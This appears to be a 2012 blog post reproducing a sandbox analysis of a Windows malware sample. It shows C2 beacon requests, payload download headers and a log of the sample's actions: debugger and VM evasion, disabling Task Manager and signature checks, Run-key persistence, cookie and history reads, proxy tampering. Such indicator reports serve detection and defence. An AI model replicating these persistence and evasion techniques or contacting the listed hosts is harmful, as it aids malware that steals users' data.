Wednesday, May 2, 2012

Antivirus scan for at UTC - VirusTotal



Bot Communication Details:
Server DNS Name: unocardgam.com   Service Port: 80
Direction | Command | User-Agent | Host | Connection | Pragma
GET | /?ylOdR9GQqXquMlTvsmXlkaz1x3Eb/A== HTTP/1.1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | unocardgam.com | |
Others | Cache-Control: no-cache

Server DNS Name: whatisadebima.com   Service Port: 80
Direction | Command | User-Agent | Host | Connection | Pragma
GET | /s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | whatisadebima.com | |
Others | Cache-Control: no-cache

Server DNS Name: psardcreator.com   Service Port: 80
Direction | Command | User-Agent | Host | Connection | Pragma
GET | /s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | psardcreator.com | |
Others | Cache-Control: no-cache

Server DNS Name: nardelfire.com   Service Port: 80
Direction | Command | User-Agent | Host | Connection | Pragma
GET | /s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | nardelfire.com | |
Others | Cache-Control: no-cache

Server DNS Name: meijeroneca.com   Service Port: 80
Direction | Command | User-Agent | Host | Connection | Pragma
GET | /s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | meijeroneca.com | |
Others | Cache-Control: no-cache

Server DNS Name: windoscarsep.com   Service Port: 80
Direction | Command | User-Agent | Host | Connection | Pragma
GET | /?ylOdR9GQqXquMlTvsmXlkaz1x3Eb/A== HTTP/1.1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | windoscarsep.com | |
Others | Cache-Control: no-cache

Server DNS Name: pastecultu.com   Service Port: 80
Direction | Command | User-Agent | Host | Connection | Pragma
GET | /s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | pastecultu.com | |
Others | Cache-Control: no-cache
  
Download Source Headers
GET /04451 HTTP/1.1
X-Powered-By: PHP/5.2.17
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_10
Content-Length: 328192
Host: his.vafex.in
Content-Disposition: attachment; filename=2917522723.exe
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Vary: User-Agent
Connection: keep-alive
Keep-Alive: timeout=1, max=100
HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Wed, 02 May 2012 15:13:23 GMT
Content-Type: application/octet-stream
Server: Apache/2


  
OS Change Detail   (version: 4.581)     | Items: 959  | OS Info: Microsoft WindowsXP Professional 5.1 sp2
Type | Mode/Class | Details (Path/Message/Protocol/Hostname/Qtype/ListenPort etc.) | Process ID | Parent ID | File Size
Analysis
Malware

Os
No:  2    Name:  windows    Version:  5.1.2600    Service Pack:  2   
Os  Monitor
No:  3    Build:  69105    Date:  Jan 24 2012    Time:  14:44:55   
Uac
Privilege use
SeTcbPrivilege
Uac
Service
Telephony
Process
Started
C:\2917522723.exe
  Parentname:  C:\WINDOWS\system32\cmd.exe
  Command Line:  "c:\2917522723.exe"
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
Process ID: 1108   Parent ID: 1228   File Size: 328192
Malicious  Alert
Anomaly  Tag
Message:   Startup behavior anomalies observed    Detail:   A new process has been launched   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 70 3e a6 4b 06 8e ca d2 b6 66 f7 f7 cd d6 ae 49 0d 8f 73 b2 2d 03 ce 7c 71 b4 af fa 1a c0 e4 99 7c 74 71 7a 63 f8 36 7d 1a 3b 58 ad b8 8a 31 7b a3 d7 70 3b 2c 6b 23 06 94 6b 85 f3 8e 51 b4 57 fe 51 ae 40 4f 00 0e 30 64 90 7b 6e 38 9d 5f 5a
1108
Malicious  Alert
Misc  Anomaly
Message:   Cryptographic operations performed    Detail:   Malware performing cryptographic operations   
Mutex
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  WaitForMultipleObjectsEx   Address:  0x77df9b26
  Params:  [2, 0x00c3ff6c, 0, 300000, 1]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x010511fa
  Params:  [5000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   Tracking Sleep/SleepEx API Call    Detail:   Malware Sleep   
Uac
Privilege use
SeTcbPrivilege
Uac
Service
Remote Access Connection Manager
API Call
  API Name:  GetLocalTime   Address:  0x00410df5
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemTime   Address:  0x00410dff
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = c5 83 42 e5 11 91 34 20 35 57 59 50 c4 e6 21 78 83 84 16 78 69 da 5a 65 b8 f3 73 aa dd b0 6d 84 24 f9 f1 40 69 90 bd 76 ad 35 61 e2 54 e1 3c a7 0c 3f 3c 40 a8 ce 36 f1 87 75 3a 27 3a e7 2c 21 aa 82 b4 7b 1d b4 44 7a 8e 98 25 d4 b6 0a b6 f1
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = c0 6a a2 93 99 7e 7d ca 3e 44 1c a3 22 6e e8 dd 38 0c 85 20 ba b9 af 58 56 d0 ca 3b e4 d1 c0 48 97 4b 18 e9 cb 3e 4a 1c b3 b6 3b b9 2f 02 af 14 38 0c d8 43 28 21 10 6c 28 1b 22 2c a9 86 fa 3d 8d 30 6e 81 f4 79 8f ae a3 92 74 c9 69 bc 0e 62
1108
API Call
  API Name:  IsDebuggerPresent   Address:  0x5ad7b1ba
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   Malware trying to detect the presence of a debugger    Detail:   Debugger awareness detected   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 18 91 9f 71 30 b0 ee ba 49 9e 86 b7 8c ae 3f 1a 54 21 76 f8 5c 2a 71 73 e3 d7 8b b0 84 8c 37 2d 1c 92 1c 35 7b 41 85 28 85 55 9f d3 b4 c1 2b 89 22 05 74 65 e1 ef d4 13 d6 05 77 41 2c a2 27 24 46 62 88 32 3f f9 a4 ff ed 1f f4 50 14 40 53 ef
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 97 e4 25 bd 0c 2c 25 26 f1 3e 0b b3 0c c0 9a ef 0d 3e f8 f5 8a 20 9e 12 04 73 1b 47 6b ee e8 85 44 2b cd 48 f4 74 69 55 6e a3 41 37 a7 eb 01 5d 9c a0 4c 3f 10 ae 37 f9 ec 8f 7b e5 3f 92 93 3f 71 7a f5 6b 0c 55 89 5b 06 14 26 3f 2b 95 73 dc
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 6d 95 39 20 e6 1c 9c 82 fb bd ae 24 54 aa 8b ed 76 dc c7 3a 25 f0 42 8a 78 96 47 e9 50 b7 c0 ae 81 47 fe 1c 27 3a 38 89 45 7a 46 66 46 95 57 d3 4e 46 8c e8 a9 62 5b da d9 f0 82 ca 14 e4 0e 64 f5 25 2f 33 3d 6c 5e 11 c1 ae 76 14 28 c5 1d 19
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 82 5e f9 d7 ae 97 df 17 30 8e 4b ed 71 02 86 e3 ca 11 d4 4e 30 ea ea e3 24 4c 4c 51 78 d9 02 b4 90 e8 25 59 2e 67 ab 5f 45 bd 6d f6 2a f9 82 82 f1 63 59 21 0e d6 73 28 f2 f0 e8 54 d0 75 09 e3 b9 76 3a ef b3 af 8b 4b cf a6 de b5 0b bc 93 a3
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = f2 c9 42 88 6d 5e 9e 62 0a 98 0d 47 91 56 22 18 98 93 ca e8 a3 4d 4c 08 78 09 f9 61 35 74 6c bb b8 9b 69 6d 16 25 cb 41 e4 c0 48 6d 63 af 22 63 e9 9e 6f b9 b1 d7 ac 38 b7 f2 80 3f b5 ab f4 bd b6 95 28 98 90 96 43 b7 d4 ec d3 7c 9e e2 c7 e2
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x74723c1f
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x74723c1f
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Params:  [0x000006f0, 5000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Params:  [0x000006f0, 5000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Params:  [0x000006f0, 5000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryW   Address:  0x76fd8a1d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Mutex
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040cf43
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x77f67d62
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   Critical error message boxes hidden    Detail:   Malware hiding critical error message boxes   
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040c8c6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData" = C:\Documents and Settings\All Users\Application Data
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObject   Address:  0x0040ce2d
  Params:  [0x000005c8, 1]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Mutex
\BaseNamedObjects\b0a589e3-5bf6-41e1-82a1-16e7c6b4417c
1108
API Call
  API Name:  Sleep   Address:  0x0040148b
  Params:  [120000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   Anti-VM evasion detected (long sleep call)    Detail:   Malware calling Win32 Sleep() or SleepEx() with a long timeout   
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
4 Repeated items skipped
API Call
  API Name:  Process32FirstW   Address:  0x0040c8c6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   10+ sleep calls    Detail:   Malware calling sleep 10+ times   
API Call
  API Name:  Sleep   Address:  0x0040ca6b
  Params:  [1]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040c8c6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
13 Repeated items skipped
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\System
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\System\"DisableTaskMgr" = 0x00000001
1108
Malicious  Alert
Misc  Anomaly
Detail:   TaskManager disabled   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"DisableTaskMgr" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Internet Explorer\Download\"CheckExeSignatures" = no
1108
Malicious  Alert
Misc  Anomaly
Message:   Malware tampering with system security settings    Detail:   Malware disabling signed binary check   
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments\"SaveZoneInformation" = 0x00000001
1108
Malicious  Alert
Misc  Anomaly
Message:   Windows explorer settings tampered    Detail:   Malware modifying windows explorer settings   
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\"LowRiskFileTypess" = .zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;.scr;
1108
File
Created
C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1108
File
Close
C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
Process ID: 1108   File Size: 328192
Process
Started
C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Parentname:  C:\2917522723.exe
  Command Line:  "C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe"
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
Process ID: 1436   Parent ID: 1108   File Size: 328192
Malicious  Alert
Misc  Anomaly
Message:   Chained executions observed    Detail:   Malware starting multiple instances of itself   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"WqOvLTCdmDgTIK.exe" = C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1108
Malicious  Alert
Misc  Anomaly
Message:   Startup services added    Detail:   Malware adding itself (non-DLL) to windows startup areas   
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Cache" = C:\Documents and Settings\admin\Local Settings\Temporary Internet Files
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Cookies" = C:\Documents and Settings\admin\Cookies
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"History" = C:\Documents and Settings\admin\Local Settings\History
1108
File
Open
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Process ID: 1108   File Size: 65536
Folder
Open
C:\Documents and Settings\admin\Cookies
1108
File
Open
C:\Documents and Settings\admin\Cookies\index.dat
Process ID: 1108   File Size: 32768
Malicious  Alert
Data  Theft
Message:   Internet Explorer cookie index read    Detail:   Malware reading IE cookie index   
File
Open
C:\Documents and Settings\admin\Local Settings\History\History.IE5\index.dat
Process ID: 1108   File Size: 32768
Malicious  Alert
Data  Theft
Message:   Internet Explorer history index read    Detail:   Malware reading IE history index   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = ef f1 16 99 05 45 d4 7b 2a 76 30 cd 69 00 83 e0 2a 53 f3 ca c0 2c 1f 90 7b 83 1d a2 1b 05 16 00 1b 9e 21 22 cf c5 85 bc 10 ee 5a d8 40 bb 40 2e 89 ea d7 18 3b 93 c1 0f 9b 99 da 65 3d 9b c3 6d 19 25 c9 36 b9 db 3f c4 ce 0e b5 94 80 72 e3 d8
1436
Mutex
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1436
Mutex
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemDirectoryW   Address:  0x76ee27b6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObjectEx   Address:  0x77e80acb
  Params:  [0x000004f1, 900000, 1]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
Mutex
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1436
API Call
  API Name:  SetErrorMode   Address:  0x769c7b85
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x769c7bc7
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForMultipleObjectsEx   Address:  0x77df9b26
  Params:  [2, 0x00c3ff6c, 0, 300000, 1]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
1108
API Call
  API Name:  GetSystemDirectoryW   Address:  0x76ee27b6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"MigrateProxy" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
1108
Malicious  Alert
Misc  Anomaly
Message:   Browser settings tampered    Detail:   Malware modifying browser proxy settings   
Regkey
Setval
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 0b 00 00 00 01 00 00 00 0d 00 00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 c0 7e dd d3 73 dc cc 01 01 00 00 00 0a 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00
1108
Malicious  Alert
Misc  Anomaly
Message:   Network settings tampered    Detail:   Browser network configuration modified   
API Call
  API Name:  Sleep   Address:  0x010511fa
  Params:  [5000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\ZoneAttributeCacheCounterMutex
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
1108
Mutex
\BaseNamedObjects\ZoneAttributeCacheCounterMutex
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
HardwareAccessDetection
  Address:  0x0000000000000000
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Mutex
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  psardcreator.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.2   Hostname:  psardcreator.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.2
  Imagepath:  C:\2917522723.exe
1108
Malicious  Alert
Misc  Anomaly
Message:   Network outbound communication attempted    Detail:   Malware attempting connections via standard ports   
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  whatisadebima.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.3   Hostname:  whatisadebima.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.3
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  nardelfire.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.4   Hostname:  nardelfire.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.4
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.2
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  pastecultu.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.5   Hostname:  pastecultu.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.5
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  meijeroneca.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.6   Hostname:  meijeroneca.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.6
  Imagepath:  C:\2917522723.exe
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Internet Explorer\Download\"CheckExeSignatures" = no
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments\"SaveZoneInformation" = 0x00000001
1108
Regkey
Setval
